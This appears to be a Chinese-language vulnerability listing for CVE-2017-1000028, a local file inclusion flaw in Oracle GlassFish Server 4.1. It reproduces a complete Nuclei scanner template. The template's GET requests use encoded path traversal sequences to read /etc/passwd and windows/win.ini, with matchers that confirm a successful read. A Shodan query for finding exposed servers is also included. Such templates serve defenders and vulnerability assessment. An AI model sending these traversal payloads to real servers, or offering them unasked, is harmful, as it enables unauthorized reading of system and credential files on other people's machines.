CVE-2017-1000028: Oracle GlassFish Server Open Source Edition 4.1 - Local File Inclusion

日期: 2025-08-01 | 影响软件: Oracle GlassFish Server Open Source Edition 4.1 | POC: 已公开

漏洞描述

Oracle GlassFish Server Open Source Edition 4.1 is vulnerable to both authenticated and unauthenticated local file inclusion vulnerabilities that can be exploited by issuing specially crafted HTTP GET requests.

PoC代码[已公开]

id: CVE-2017-1000028

info:
  name: Oracle GlassFish Server Open Source Edition 4.1 - Local File Inclusion
  author: pikpikcu,daffainfo
  severity: high
  description: Oracle GlassFish Server Open Source Edition 4.1 is vulnerable to both authenticated and unauthenticated local file inclusion vulnerabilities that can be exploited by issuing specially crafted HTTP GET requests.
  remediation: |
    Apply the necessary patches or updates provided by Oracle to fix the LFI vulnerability in GlassFish Server.
  reference:
    - https://www.exploit-db.com/exploits/45196
    - https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=18822
    - https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2015-016/?fid=6904
    - https://www.exploit-db.com/exploits/45196/
    - https://nvd.nist.gov/vuln/detail/CVE-2017-1000028
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2017-1000028
    cwe-id: CWE-22
    epss-score: 0.9387
    epss-percentile: 0.99865
    cpe: cpe:2.3:a:oracle:glassfish_server:4.1:*:*:*:open_source:*:*:*
  metadata:
    max-request: 2
    vendor: oracle
    product: glassfish_server
    shodan-query: cpe:"cpe:2.3:a:oracle:glassfish_server"
  tags: cve,cve2017,oracle,glassfish,lfi,edb

http:
  - method: GET
    path:
      - "{{BaseURL}}/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd"
      - "{{BaseURL}}/theme/META-INF/prototype%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini"

    stop-at-first-match: true

    matchers-condition: or
    matchers:
      - type: dsl
        dsl:
          - "regex('root:.*:0:0:', body)"
          - "status_code == 200"
        condition: and

      - type: dsl
        dsl:
          - "contains(body, 'bit app support')"
          - "contains(body, 'fonts')"
          - "contains(body, 'extensions')"
          - "status_code == 200"
        condition: and
# digest: 4a0a00473045022100ca1cda0bf25a6e981e218454ddc24506d41bdf8681a429d418a84eb89f617caa0220521adf2da89cd0f5655ae811a6d61d1a71849833492e180cdaafab2ff31c4606:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2017/CVE-2017-1000028.yaml

相关漏洞推荐